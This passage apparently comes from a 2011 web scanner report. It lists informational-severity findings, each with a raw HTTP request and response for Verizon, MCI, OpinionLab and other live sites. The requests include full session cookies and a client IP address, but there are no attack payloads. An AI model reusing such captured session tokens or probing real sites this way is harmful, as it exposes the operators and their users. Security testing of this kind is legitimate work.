GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=

firstName=&lastName=&phoneNumber=&emailAddress=&reenterEmailAddress=&country=-1&address1=&address2=&city=&zipcode=&companyName=&companyCountry=-1&companyAddress1=&companyAddress2=&companyCity=&company
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:25:57 GMT
Content-Length: 45631
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]...

23.13. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/s.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/includes/s.gif

Request

GET /enterprisesolutions/staticcontent/includes/s.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Vary: accept-encoding
Content-Length: 2270
Cache-Control: private, max-age=7174
Date: Mon, 05 Sep 2011 22:23:14 GMT
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Verizo
...[SNIP]...

23.14. https://enterprisecenter.verizon.com/future/vzw/css_reference_PatLib/includes/css/print.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /future/vzw/css_reference_PatLib/includes/css/print.css

Request

GET /future/vzw/css_reference_PatLib/includes/css/print.css HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Vary: accept-encoding
Cache-Control: private, max-age=21804
Date: Mon, 05 Sep 2011 22:26:21 GMT
Content-Length: 2270
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Verizo
...[SNIP]...

23.15. https://enterpriseportalcontent.mci.com/CC/public/Login/en-US/Enroll.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterpriseportalcontent.mci.com
Path:   /CC/public/Login/en-US/Enroll.htm

Request

GET /CC/public/Login/en-US/Enroll.htm HTTP/1.1
Host: enterpriseportalcontent.mci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Date: Mon, 05 Sep 2011 22:35:25 GMT
Content-Length: 7369
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <title id="PageTitle">Verizon Enterprise Center</title>
       <meta content="M
...[SNIP]...

23.16. https://seal.verisign.com/getseal

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.verisign.com
Path:   /getseal

Request

GET /getseal HTTP/1.1
Host: seal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 22:35:39 GMT
Connection: close

<!-- x=1; -->

23.17. https://secure.opinionlab.com/ccc01/comment_card.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 7518
Content-Type: text/html; Charset=UTF-8
Cool02: Opinionlab - Cool02
Date: Mon, 05 Sep 2011 22:35:39 GMT
Connection: close

<!--TEMPLATE version 3.4 UNIVERSAL CSS: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment
...[SNIP]...

23.18. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_json_4_0_b.asp

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8154
Content-Type: text/html; Charset=UTF-8
Cool01: Opinionlab - Cool01
Set-Cookie: ASPSESSIONIDAAAQCDSR=CBJOPHDCDACKEPKDCCMHHGPC; path=/
Date: Mon, 05 Sep 2011 22:35:41 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS ON PAGE b: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<titl
...[SNIP]...

23.19. https://secure.opinionlab.com/rate36_json.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /rate36_json.asp

Request

GET /rate36_json.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

23.20. https://secure.opinionlab.com/rate36s.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /rate36s.asp

Request

GET /rate36s.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

23.21. https://signin.verizon.com/sso/ForgotPassword

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/ForgotPassword

Request

GET /sso/ForgotPassword HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:48 GMT
Server: Apache
Content-Length: 0
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Connection: close
Content-Type: text/html


23.22. https://signin.verizon.com/sso/ForgotUserIdAndPwd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/ForgotUserIdAndPwd

Request

GET /sso/ForgotUserIdAndPwd HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:48 GMT
Server: Apache
Content-Length: 0
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Connection: close
Content-Type: text/html


23.23. https://signin.verizon.com/sso/ResetAccount

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/ResetAccount

Request

GET /sso/ResetAccount HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:47 GMT
Server: Apache
Content-Length: 0
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Connection: close
Content-Type: text/html


23.24. https://signin.verizon.com/sso/RetrieveUserID

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/RetrieveUserID

Request

GET /sso/RetrieveUserID HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:47 GMT
Server: Apache
Content-Length: 0
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Connection: close
Content-Type: text/html


23.25. https://signin.verizon.com/sso/forgotFlows/locateBAN.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/forgotFlows/locateBAN.jsp

Request

GET /sso/forgotFlows/locateBAN.jsp HTTP/1.1
Host: signin.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; VZSSOCOM_SESSIONID=3G0bTlLf1jTwG4vn19Q6hKvqw4QjypJ4qhDWfmfDPR62TbVp8RjL!419329926!559599265; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:23:29 GMT
Server: Apache
Content-Length: 11472
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Locate Your Verizon Account Number</title>

</head>

<body class="border">
<table border="0" width="100%" id="table1" height="79">
   <tr>
       <td style="padding-top: 10px; padding-le
...[SNIP]...

23.26. https://www.bbb.org/online/consumer/cks.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bbb.org
Path:   /online/consumer/cks.aspx

Request

GET /online/consumer/cks.aspx HTTP/1.1
Host: www.bbb.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Sep 2011 22:36:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Cache-Control: private
Content-Length: 7622
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   B
...[SNIP]...

23.27. https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.whitefence.com
Path:   /WebObjects/WhiteFence.woa/wa/login

Request

GET /WebObjects/WhiteFence.woa/wa/login HTTP/1.1
Host: www.whitefence.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple
Date: Mon, 05 Sep 2011 22:37:08 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:37:08 GMT
content-length: 8417
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.whitefence.com
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
   <HEAD>
       <META name="generator" CONTENT="WebObjects 4.5">
       

   <LINK REL="StyleSheet" TYPE="text/css" MEDIA="screen, print" HREF="https://www.
...[SNIP]...

23.28. https://www.whitefence.com/WebObjects/WhiteFenceService.woa/wa/forgotPassword

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.whitefence.com
Path:   /WebObjects/WhiteFenceService.woa/wa/forgotPassword

Request

GET /WebObjects/WhiteFenceService.woa/wa/forgotPassword HTTP/1.1
Host: www.whitefence.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple
Date: Mon, 05 Sep 2011 22:37:08 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:37:08 GMT
set-cookie: cmIdentifier=1; version="1"; expires=Mon, 12-Sep-2011 22:37:08 GMT; path=/; domain=.whitefence.com
content-length: 6130
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.whitefence.com
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
   <HEAD>
       

   <LINK REL="StyleSheet" TYPE="text/css" MEDIA="screen, print" HREF="https://www.whitefence.com/qstyles/1000001.css">

       <TITLE>Cust
...[SNIP]...

23.29. https://www22.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /

Request

GET /?lid=//global//residential HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 128679
Cache-Control: private, max-age=1800
Date: Mon, 05 Sep 2011 22:19:42 GMT
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head >
<title>Verizon | Broadband (DSL) Internet Service, Cable TV (Digital TV,
...[SNIP]...

23.30. https://www22.verizon.com/ForYourHome/VzRepair/VzIHA/TealeafTarget.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/VzRepair/VzIHA/TealeafTarget.aspx

Request

POST /ForYourHome/VzRepair/VzIHA/TealeafTarget.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen
Content-Length: 900
X-TeaLeaf-Page-Objects: 0
Origin: https://www22.verizon.com
X-TeaLeaf-Page-Img-Fail: 0
X-TeaLeaf-Page-Render: 19471
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /ForYourHome/VZRepair/vziha/Service.aspx
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

<ClientEventSet PostTimeStamp="1315279530416" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID22H24M40S942R0.9401596281677485" TimeDuration="19471" DateSince1970="1315279500413" >
...[SNIP]...

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 237
Date: Mon, 05 Sep 2011 22:26:23 GMT
Connection: keep-alive
Vary: Accept-Encoding


